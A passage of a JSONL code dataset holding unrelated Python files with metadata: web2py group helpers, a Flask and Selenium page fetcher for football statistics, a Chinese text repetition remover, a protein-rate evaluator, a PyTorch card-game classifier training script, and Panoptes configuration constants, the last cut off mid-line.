+{"seq_id":"66706278","text":"# -*- coding: utf-8 -*-\nfrom random import randint\n\ndef dono_grupo(id_grupo):\n\tgrupo = db(Grupo.id == id_grupo).select().first()\n\tif auth.user and grupo.created_by == auth.user.id:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef participa_grupo(id_grupo):\n\tgrupo = db(Grupo.id == id_grupo).select().first()\n\tif auth.user:\n\t\tif grupo.created_by == auth.user.id:\n\t\t\treturn True\n\t\telif db((Usuario_Grupo.id_grupo == id_grupo) &\\\n\t\t\t\t(Usuario_Grupo.id_auth_user == auth.user.id)\\\n\t\t\t\t).count():\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\ndef gerar_hash_id():\n\timport uuid\n\n\thash_id = str(uuid.uuid4())[-12:]\n\twhile db(Grupo.hash_id == hash_id).count():\n\t\thash_id = str(uuid.uuid4())[-12:]\n\n\treturn hash_id\n\ndef realizar_sorteio(participantes):\n\tfrom random import shuffle\n\tshuffle(participantes)\n\treturn participantes\n\n","sub_path":"models/global_functions.py","file_name":"global_functions.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"582047648","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 16 13:45:10 2020\n\n@author: lemar\n\"\"\"\n\nfrom flask import Flask, json\nfrom selenium import webdriver\nimport os\n#import pandas as pd\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--disable-dev-shm-usage\")\nchrome_options.add_argument(\"--no-sandbox\")\ndriver = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=chrome_options)\n\napi = Flask(__name__)\n\n@api.route('/rushing', methods=['GET'])\ndef get_rushing():\n print(\"received get request\")\n url = \"https://www.pro-football-reference.com/years/2019/rushing_advanced.htm\"\n #load the page\n driver.get(url)\n print(\"got content\")\n rushing_info = { \"html\" : str(driver.page_source)}\n #rushing_info = { \"html\" : \"rushing info\"}\n print(\"returning content\")\n return json.dumps(rushing_info)\n\nif __name__ == '__main__':\n print(\"server up\")\n api.run()","sub_path":"flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639219165","text":"#coding=utf-8\nfrom wordseg_python import Global\n\nPUNC = [',', ',', '。', '.', '!', '!', '\"', '?', '?']\nCOMMON = ['你', '我', '的', '哈', '他', '她']\n \ndef split(sent):\n sent = sent.decode('utf-8', 'ignore').encode('gbk', 'ignore')\n tuples = [(word.decode(\"gbk\").encode(\"utf-8\"), pos)\n for word, pos in Global.GetTokenPos(sent)]\n return [each[0] for each in tuples]\n\ndef remove_rep(sent):\n length = 4\n while length > 1:\n index = -1\n for i in range(len(sent)-2*length+1):\n if ''.join(sent[i:i+length]) == ''.join(sent[i+length:i+2*length]):\n index = i\n break\n if index >= 0:\n #print (length, index)\n sent = sent[:i]+sent[i+length:]\n else:\n length -= 1\n length = 6\n while length > 0:\n index = -1\n for i in range(len(sent)-2*length):\n if (sent[i+length] in PUNC):\n if ''.join(sent[i:i+length]) == ''.join(sent[i+1+length:i+1+2*length]):\n index = i\n break\n if index >= 0:\n #print (length, index)\n sent = sent[:i]+sent[i+length+1:]\n else:\n length -= 1\n return sent\n\n\ndef work(sent):\n before = split(sent)\n after = remove_rep(before)\n if before != after:\n print('before: '+' '.join(before))\n print(' after: '+' '.join(after))\n\n#with open('0330.txt') as f:\n# for line in f:\n# work(line.strip().split()[1])\n","sub_path":"models/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87534214","text":"#!/usr/bin/env python3\n\nimport csv\nimport math\n\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\n\n#-------------------------------------------------------------------------------\n\n# Imports table from pinetree output and calculates protein production rate\n# at steady state\nclass EvalSteadyState:\n def __init__(self):\n self.time = []\n self.ribosome_counts = []\n self.protein_counts = []\n self.fitness = \"\"\n self.slopes = []\n self.x = []\n self.y = []\n\n def importTable(self,file,protein_name):\n '''open tsv file from pinetree, split each column into lists '''\n simulation = open(file, 'r')\n proteins = []\n time = []\n feature = []\n lines = simulation.readlines()\n linecounter = 0\n for line in lines:\n if linecounter == 0:\n print(\"header found\")\n else:\n data = line.strip().split('\\t')\n proteins.append(float(data[2]))\n time.append(float(data[0]))\n feature.append(str(data[1]))\n linecounter += 1\n simulation.close()\n\n #filter table for protein feature\n for i in range(len(feature)):\n if feature[i] == '__ribosome':\n self.ribosome_counts.append(proteins[i])\n self.time.append(time[i])\n if feature[i] == str(protein_name):\n self.protein_counts.append(proteins[i])\n return(self.time,self.ribosome_counts,self.protein_counts)\n\n def ribo_slope(self,times,ribosome_counts):\n for i in range(len(times)):\n if i <= len(times) - 3:\n try:\n self.slopes.append((ribosome_counts[i+1] - ribosome_counts[i]) / (times[i+1]-times[i]))\n except ZeroDivisionError: \n self.slopes.append(0)\n return self.slopes\n\n def steady_state(self,times,slopes,ribosome_counts,protein_counts):\n '''find where the slope of ribosome counts has leveled at zero,\n calculate the protein production rate after that point'''\n for i in range(len(times)):\n average_slope = np.average(self.slopes[i:i+6]) #average of 5 points in list\n if math.fabs(average_slope) <= 0.01 and i <= (len(times)-10): #finds slopes that were calculated closely around 0\n self.y = protein_counts[i:len(protein_counts)]\n self.x = times[i:len(protein_counts)]\n break\n return self.x, self.y\n\n def linreg(self, x, y):\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n self.fitness = slope\n return self.fitness\n","sub_path":"scripts/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"359043010","text":"\n\n#calss header\nclass _COUNTERACT():\n\tdef __init__(self,): \n\t\tself.name = \"COUNTERACT\"\n\t\tself.definitions = [u'to reduce or remove the effect of something unwanted by producing an opposite effect: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_counteract.py","file_name":"_counteract.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"436179098","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CardDataLoader(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, org_data_feat, org_data_label, batch_size):\n self.data_all_feat = org_data_feat\n self.data_all_label = org_data_label\n self.batch_size = batch_size\n\n def __len__(self):\n if(len(self.data_all_feat) % self.batch_size == 0):\n return len(self.data_all_feat) // self.batch_size\n else:\n return (len(self.data_all_feat) // self.batch_size)+1\n #return len(self.data_all_feat)\n\n def __getitem__(self, idx):\n begin = self.batch_size*idx\n end = self.batch_size*(idx+1)\n feats = self.data_all_feat[begin:end]\n labels = self.data_all_label[begin:end]\n return feats, labels\n\n##############################################################################################################\n#\n#importing data files\n#\ntraining_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataMovement.txt\", \"r\")\ntraining_data = training_file.readlines()\ntraining_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataSuit.txt\", \"r\")\ntraining_data_suit = training_suit.readlines()\ntraining_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataRank.txt\", \"r\")\ntraining_data_rank = training_rank.readlines()\ntraining_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataUniqueness.txt\", \"r\")\ntraining_data_uniqueness = training_uniqueness.readlines()\nprint(\"reading training data done\")\n\nvalidation_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataMovement.txt\", \"r\")\nvalidation_data = validation_file.readlines()\nvalidation_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataSuit.txt\", \"r\")\nvalidation_data_suit = validation_suit.readlines()\nvalidation_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataRank.txt\", \"r\")\nvalidation_data_rank = validation_rank.readlines()\nvalidation_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataUniqueness.txt\", \"r\")\nvalidation_data_uniqueness = validation_uniqueness.readlines()\nprint(\"reading validation data done\")\n\ntesting_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataMovement.txt\", \"r\")\ntesting_data = testing_file.readlines()\ntesting_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataSuit.txt\", \"r\")\ntesting_data_suit = testing_suit.readlines()\ntesting_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataRank.txt\", \"r\")\ntesting_data_rank = testing_rank.readlines()\ntesting_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataUniqueness.txt\", \"r\")\ntesting_data_uniqueness = testing_uniqueness.readlines()\nprint(\"reading testing data done\")\n\nstring_training_data = []\nstring_training_data_rank = []\nstring_training_data_suit = []\nstring_training_data_uniqueness = []\ninput_training_data = []\ninput_training_data_rank = []\ninput_training_data_suit = []\ninput_training_data_uniqueness = []\ninput_training_data_total = []\noutput_training_data = 
[]\n\nstring_validation_data = []\nstring_validation_data_rank = []\nstring_validation_data_suit = []\nstring_validation_data_uniqueness = []\ninput_validation_data = []\ninput_validation_data_rank = []\ninput_validation_data_suit = []\ninput_validation_data_uniqueness = []\ninput_validation_data_total = []\noutput_validation_data = []\n\nstring_testing_data = []\nstring_testing_data_rank = []\nstring_testing_data_suit = []\nstring_testing_data_uniqueness = []\ninput_testing_data = []\ninput_testing_data_rank = []\ninput_testing_data_suit = []\ninput_testing_data_uniqueness = []\ninput_testing_data_total = []\noutput_testing_data = []\n\n# our data\n# N = 1862\n# N_valid = 1120\n# N_test = 744\n\nN = 1862\nN_valid = 1120\nN_test = 997018\n\n# their data\n# N = 682728\n# N_valid = 363022\n# N_test = 347680\n\n# combined data\n# N = 684590\n# N_valid = 364142\n# N_test = 1344698\n\nD_in = 32\nD_out = 2\nH1, H2, H3, H4, H5, H6, H7, H8, H9, H10, H11, H12, H13, H14, H15 = 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2\n\n######################################################\n#\n#creating training set\n#\nfor line in training_data:\n data = line.split()\n string_training_data.append(data)\nfor line in training_data_suit:\n data = line.split()\n string_training_data_suit.append(data)\nfor line in training_data_rank:\n data = line.split()\n string_training_data_rank.append(data)\nfor line in training_data_uniqueness:\n data = line.split()\n string_training_data_uniqueness.append(data)\nprint(\"training set to string complete\")\n\n#####################################################\n#\n#creating validation set\n#\nfor line in validation_data:\n data = line.split()\n string_validation_data.append(data)\nfor line in validation_data_suit:\n data = line.split()\n string_validation_data_suit.append(data)\nfor line in validation_data_rank:\n data = line.split()\n string_validation_data_rank.append(data)\nfor line in validation_data_uniqueness:\n data = line.split()\n string_validation_data_uniqueness.append(data)\nprint(\"validation set to string complete\")\n\n####################################################\n#\n#creating testing set\n#\nfor line in testing_data:\n data = line.split()\n string_testing_data.append(data)\nfor line in testing_data_suit:\n data = line.split()\n string_testing_data_suit.append(data)\nfor line in testing_data_rank:\n data = line.split()\n string_testing_data_rank.append(data)\nfor line in testing_data_uniqueness:\n data = line.split()\n string_testing_data_uniqueness.append(data)\nprint(\"testing set to string complete\")\n\n#####################################################\n#\n#converting training set into data training set\n#\nfor data_lines in string_training_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_training_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_training_data.append(output)\n\nfor data_lines in string_training_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data.append(line_data)\n position = 0\nfor data_lines in string_training_data_rank:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n 
line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_rank.append(line_data)\n position = 0\nfor data_lines in string_training_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_suit.append(line_data)\n position = 0\nfor data_lines in string_training_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_uniqueness.append(line_data)\n position = 0\nprint(\"training data to arrays complete\")\n##########################################################\n#\n#converting validation set into data validation set\n#\nfor data_lines in string_validation_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_validation_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_validation_data.append(output)\nfor data_lines in string_validation_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data.append(line_data)\n position = 0\nfor data_lines in string_validation_data_rank:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_rank.append(line_data)\n position = 0\nfor data_lines in string_validation_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_suit.append(line_data)\n position = 0\nfor data_lines in string_validation_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_uniqueness.append(line_data)\n position = 0\nprint(\"validation data to arrays complete\")\n#########################################################\n#\n#converting testing set into data testing sets\n#\nfor data_lines in string_testing_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_testing_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_testing_data.append(output)\nfor data_lines in string_testing_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data.append(line_data)\n position = 0\nfor data_lines in string_testing_data_rank:\n 
line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_rank.append(line_data)\n position = 0\nfor data_lines in string_testing_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_suit.append(line_data)\n position = 0\nfor data_lines in string_testing_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_uniqueness.append(line_data)\n position = 0\nprint(\"testing data to arrays complete\")\n##############################################################\n#\n#combining suit, data, and rank into one big tensor\n#\nfor i in range(0, N):\n training_three_channels = []\n # training_three_channels.append(input_training_data[i])\n # training_three_channels.append(input_training_data_rank[i])\n # training_three_channels.append(input_training_data_suit[i])\n training_three_channels.append(input_training_data_uniqueness[i])\n input_training_data_total.append(training_three_channels)\nfor i in range(0, N_valid):\n validation_three_channels = []\n # validation_three_channels.append(input_validation_data[i])\n # validation_three_channels.append(input_validation_data_rank[i])\n # validation_three_channels.append(input_validation_data_suit[i])\n validation_three_channels.append(input_validation_data_uniqueness[i])\n input_validation_data_total.append(validation_three_channels)\nfor i in range(0, N_test):\n testing_three_channels = []\n # testing_three_channels.append(input_testing_data[i])\n # testing_three_channels.append(input_testing_data_rank[i])\n # testing_three_channels.append(input_testing_data_suit[i])\n testing_three_channels.append(input_testing_data_uniqueness[i])\n input_testing_data_total.append(testing_three_channels)\nprint(\"combining data complete\")\n######################################################################\n#\n#converting into numpy arrays\n#\n\nnumpy_training_output_data = np.asarray(output_training_data, dtype=np.float32)\nnumpy_training_input_data = np.asarray(input_training_data_total, dtype=np.float32)\n\nnumpy_validation_output_data = np.asarray(output_validation_data, dtype=np.float32)\nnumpy_validation_input_data = np.asarray(input_validation_data_total, dtype=np.float32)\n\nnumpy_testing_output_data = np.asarray(output_testing_data, dtype=np.float32)\nnumpy_testing_input_data = np.asarray(input_testing_data_total, dtype=np.float32)\n\nprint(\"conversion to numpy arrays complete\")\n##########################################################################3\n#\n#converting to tensors\n#\ntensor_training_output_data = torch.from_numpy(numpy_training_output_data).float()\ntensor_training_input_data = torch.from_numpy(numpy_training_input_data).float()\n\ntensor_validation_output_data = torch.from_numpy(numpy_validation_output_data).float()\ntensor_validation_input_data = torch.from_numpy(numpy_validation_input_data).float()\n\ntensor_testing_output_data = torch.from_numpy(numpy_testing_output_data).float()\ntensor_testing_input_data = 
torch.from_numpy(numpy_testing_input_data).float()\n\nprint(\"conversion to tensors complete\")\n\n########################################################\n# debugging images\n\n# def imshow_three(img):\n# npimg = img.numpy()\n# plt.imshow(npimg[0, :, :])\n# plt.imshow(npimg[1, :, :])\n# plt.imshow(npimg[2, :, :])\n# plt.imshow(npimg[3, :, :])\n# plt.imshow(npimg)\n#\n#\n# def imshow_one(img):\n# img = img / (3 - 0)\n# npimg = img.numpy()\n# plt.imshow(npimg)\n#\n# img_test = tensor_testing_input_data[3]\n# imshow_three(img_test)\n\n##################################################################\n#\n#image recognizer nn model\n#\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # in_ch, out_ch, kernel_size, stride, padding\n self.conv1 = nn.Conv2d(1, 2, 3, 1, 1) # 6 was chosen because tutorial is 3-6\n self.conv1_batch = nn.BatchNorm2d(4)\n self.pool = nn.MaxPool2d(2, 2)\n self.fc1 = nn.Linear(2 * 2 * 2, 32)\n self.fc2 = nn.Linear(32, 30)\n self.fc3 = nn.Linear(30, 28)\n self.fc4 = nn.Linear(28, 26)\n self.fc5 = nn.Linear(26, 24)\n self.fc6 = nn.Linear(24, 22)\n self.fc7 = nn.Linear(22, 20)\n self.fc8 = nn.Linear(20, 18)\n self.fc9 = nn.Linear(18, 16)\n self.fc10 = nn.Linear(16, 14)\n self.fc11 = nn.Linear(14, 12)\n self.fc12 = nn.Linear(12, 10)\n self.fc13 = nn.Linear(10, 8)\n self.fc14 = nn.Linear(8, 6)\n self.fc15 = nn.Linear(6, 4)\n self.fc16 = nn.Linear(4, 2)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = x.view(-1, 2 * 2 * 2) # based on size calculation\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = F.relu(self.fc4(x))\n x = F.relu(self.fc5(x))\n x = F.relu(self.fc6(x))\n x = F.relu(self.fc7(x))\n x = F.relu(self.fc8(x))\n x = F.relu(self.fc9(x))\n x = F.relu(self.fc10(x))\n x = F.relu(self.fc11(x))\n x = F.relu(self.fc12(x))\n x = F.relu(self.fc13(x))\n x = F.relu(self.fc14(x))\n x = F.relu(self.fc15(x))\n x = self.fc16(x)\n return x\n\nmodel = Net()\n\n################################################################\n#\n#using gpu\n#\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel.to(device)\n\n######################################################################\n\nd = CardDataLoader(tensor_training_input_data, tensor_training_output_data, 100)\n\n################################################################\n#\n#send tensors to gpu\n#\n\n#defining loss function\nloss_fn = torch.nn.MSELoss(reduction='sum')\n\n#defining optimizer and scheduler for learning rate\nlearning_rate = 0.001\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=130, gamma=0.1)\n\n########################################################################\n#\n#training the neural network\n#\nfor t in range(500):\n scheduler.step()\n running_loss=0.0\n for ii in range(len(d)):\n feats, labels = d[ii]\n\n feats = feats.to(device)\n labels = labels.to(device) \n\n output_pred = model(feats)\n\n # pos_train_samples = (output_pred[:, 0] > output_pred[:, 1]).sum()\n # neg_train_samples = (output_pred[:, 0] <= output_pred[:, 1]).sum()\n # output_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_train_samples, -1)\n # output_pred[output_pred[:, 0] > output_pred[:, 1]] = output_pred_pos\n # output_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_train_samples, -1)\n # output_pred[output_pred[:, 0] <= output_pred[:, 1]] = output_pred_neg\n\n loss = loss_fn(output_pred, labels)\n\n 
optimizer.zero_grad()\n\n loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item()\n #print(loss.item())\n if ii == (len(d)-1): # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (t + 1, ii + 1, running_loss / len(d)))\n running_loss = 0.0\n\n########################################################################\n#\n#checking accuracy with training data after training\n#\n# output_train_pred = model(tensor_training_input_data)\n#\n# loss = loss_fn(output_train_pred, tensor_training_output_data)\n#\n# # pos_samples = (output_train_pred[:, 0] > output_train_pred[:, 1]).sum()\n# # neg_samples = (output_train_pred[:, 0] <= output_train_pred[:, 1]).sum()\n# # output_train_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\n# # output_train_pred[output_train_pred[:, 0] > output_train_pred[:, 1]] = output_train_pred_pos\n# # output_train_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\n# # output_train_pred[output_train_pred[:, 0] <= output_train_pred[:, 1]] = output_train_pred_neg\n#\n# y_all = torch.cat((tensor_training_output_data, output_train_pred), 1)\n# print(y_all)\n# # In order to compute the accuracy, you need to find the samples with the same label\n# error_train = tensor_training_output_data.sub(output_train_pred)\n# error_train = error_train.abs_()\n# error_train = error_train.sum(1) # summation column-wise, i.e. all output nodes\n# # find all zero values (i.e. each zero will count as one),\n# mask_error_train = (error_train == 0.0)\n# # add them up, (we need to convert the result into float type to avoid getting zero)\n# number_of_correct = mask_error_train.sum().type(torch.FloatTensor)\n# # then divide by the total number of samples.\n# ACC_train = number_of_correct.div(N * 1.0) * 100.0\n# print(\"Accuracy = %f %%\" % ACC_train)\n\ntensor_validation_output_data = tensor_validation_output_data.to(device)\ntensor_validation_input_data = tensor_validation_input_data.to(device)\ntensor_testing_output_data = tensor_testing_output_data.to(device)\ntensor_testing_input_data = tensor_testing_input_data.to(device)\n\n######################################################################\n#\n#checking accuracy with validation data after training\n#\noutput_valid_pred = model(tensor_validation_input_data)\n\nloss = loss_fn(output_valid_pred, tensor_validation_output_data)\n\npos_samples = (output_valid_pred[:, 0] > output_valid_pred[:, 1]).sum()\nneg_samples = (output_valid_pred[:, 0] <= output_valid_pred[:, 1]).sum()\noutput_valid_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\noutput_valid_pred[output_valid_pred[:, 0] > output_valid_pred[:, 1]] = output_valid_pred_pos\noutput_valid_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\noutput_valid_pred[output_valid_pred[:, 0] <= output_valid_pred[:, 1]] = output_valid_pred_neg\n\ny_all = torch.cat((tensor_validation_output_data, output_valid_pred), 1)\nprint(y_all)\n# In order to compute the accuracy, you need to find the samples with the same label\nerror_valid = tensor_validation_output_data.sub(output_valid_pred)\nerror_valid = error_valid.abs_()\nerror_valid = error_valid.sum(1) # summation column-wise, i.e. all output nodes\n# find all zero values (i.e. 
each zero will count as one),\nmask_error_valid = (error_valid == 0.0)\n# add them up, (we need to convert the result into float type to avoid getting zero)\nnumber_of_correct = mask_error_valid.sum().type(torch.FloatTensor)\n# then divide by the total number of samples.\nACC_valid = number_of_correct.div(N_valid * 1.0) * 100.0\nprint(\"Accuracy = %f %%\" % ACC_valid)\n#\n######################################################################################\n#\n#checking accuracy with testing data after training\n#\noutput_test_pred = model(tensor_testing_input_data)\n\nloss = loss_fn(output_test_pred, tensor_testing_output_data)\n\npos_samples = (output_test_pred[:, 0] > output_test_pred[:, 1]).sum()\nneg_samples = (output_test_pred[:, 0] <= output_test_pred[:, 1]).sum()\noutput_test_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\noutput_test_pred[output_test_pred[:, 0] > output_test_pred[:, 1]] = output_test_pred_pos\noutput_test_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\noutput_test_pred[output_test_pred[:, 0] <= output_test_pred[:, 1]] = output_test_pred_neg\n\ny_all = torch.cat((tensor_testing_output_data, output_test_pred), 1)\nprint(y_all)\n# In order to compute the accuracy, you need to find the samples with the same label\nerror_test = tensor_testing_output_data.sub(output_test_pred)\nerror_test = error_test.abs_()\nerror_test = error_test.sum(1) # summation column-wise, i.e. all output nodes\n# find all zero values (i.e. each zero will count as one),\nmask_error_test = (error_test == 0.0)\n# add them up, (we need to convert the result into float type to avoid getting zero)\nnumber_of_correct = mask_error_test.sum().type(torch.FloatTensor)\n# then divide by the total number of samples.\nACC_test = number_of_correct.div(N_test * 1.0) * 100.0\nprint(\"Accuracy = %f %%\" % ACC_test)\n\nimport sklearn.metrics as metrics\n\ntensor_testing_output_data = tensor_testing_output_data.cpu().detach().numpy()\noutput_test_pred = output_test_pred.cpu().detach().numpy()\n\ny_all_gt = tensor_testing_output_data[:, 0]\ny_all_pred = output_test_pred[:, 0]\n\ntn, fp, fn, tp = metrics.confusion_matrix(y_all_gt, y_all_pred).ravel()\nprint(tp, fp, fn, tn)\nprint(tp / (tp+fn))\nprint(tn / (tn+fp))\n# f1_test = metrics.f1_score(y_all_gt, y_all_pred)\n#print(f1_test)\n# for data in range(1862):\n# input = tensor_testing_input_data[data]\n# outputs = model(input)\n# _, predicted = torch.max(outputs.data, 1)\n# total += 1\n# correct += (predicted == tensor_testing_output_data[data]).item()\n\n#print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total))","sub_path":"Neural_Network/bin/Birds_of_A_Feather_NN.py","file_name":"Birds_of_A_Feather_NN.py","file_ext":"py","file_size_in_byte":24588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"589034036","text":"\"\"\"\nCopyright 2018, Oath Inc.\nLicensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.\n\nThis module contains constants used throughout the Panoptes system\n\"\"\"\n\n# System Wide Constants\nimport signal\n# The SIGNALS_TO_NAMES_DICT code comes from Python Standard Library By Example\nSIGNALS_TO_NAMES_DICT = dict((getattr(signal, n), n)\n for n in dir(signal) if n.startswith('SIG') and '_' not in n)\nKEY_VALUE_NAMESPACE_PREFIX = 'panoptes:'\nDEFAULT_ROOT_LOGGER_NAME = 'panoptes'\nDEFAULT_LOG_FORMAT = '[%(asctime)s: %(levelname)s/%(processName)s] %(message)s'\nCELERY_LOADER_MODULE = 'celery.utils.imports'\nDEFAULT_REDIS_GROUP_NAME = 'default'\nKV_STORE_DELIMITER = '|'\nKV_STORE_SCAN_ITER_COUNT = 1000\nKV_NAMESPACE_DELIMITER = ':'\n\n# Configuration Manager Related Constants\nCONFIG_FILE_ENVIRONMENT_VARIABLE = 'PANOPTES_CONFIG_FILE'\nDEFAULT_CONFIG_FILE_PATH = '/home/panoptes/conf/panoptes.ini'\n\n# Plugin Scheduler Related Constants\nPLUGIN_TYPES = ['discovery', 'polling', 'enrichment']\nPLUGIN_EXTENSION = 'panoptes-plugin'\nPLUGINS_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'plugins_kv'\nPLUGIN_SCHEDULER_LOCK_PATH = '/panoptes/plugin_scheduler'\nPLUGIN_CLIENT_ID_PREFIX = 'plugin'\n\n# Plugin Agent Related Constants\nPLUGINS_METADATA_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'plugins_metadata'\nPLUGIN_AGENT_LOCK_PATH = '/panoptes/plugin_agent'\nPLUGIN_AGENT_LOCK_ACQUIRE_TIMEOUT = 5\nPLUGIN_AGENT_PLUGIN_TIMESTAMPS_EXPIRE = 604800\nPLUGIN_AGENT_PLUGIN_EXPIRES_MULTIPLE = 